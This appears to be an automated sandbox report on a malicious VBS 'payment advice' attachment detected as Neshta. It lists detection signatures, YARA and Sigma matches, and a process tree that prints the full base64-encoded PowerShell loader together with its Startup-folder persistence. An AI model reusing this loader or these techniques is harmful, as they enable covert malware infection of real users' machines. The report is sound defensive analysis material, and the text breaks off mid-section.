Windows Analysis Report
PaymentAdvice-1629043.vbs
Overview
General Information
Detection
Neshta
Metric | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Neshta
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Injects a PE file into a foreign process
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5948 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PaymentAdvice-1629043.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 3012 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\PaymentAdvice-1629043.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PaymentAdvice-1629043.vbs.exe (PID: 6076 cmdline: "C:\Users\user\Desktop\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- InstallUtil.exe (PID: 4592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- wscript.exe (PID: 344 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Value.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 5948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Value.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 1352 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Value.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Value.vbs.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Roaming\Value.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- InstallUtil.exe (PID: 5332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
neshta | Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something." | No Attribution | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| JoeSecurity_Neshta | Yara detected Neshta | Joe Security | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Neshta | Yara detected Neshta | Joe Security | |
| MALWARE_Win_Neshta | Detects Neshta | ditekSHen | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems):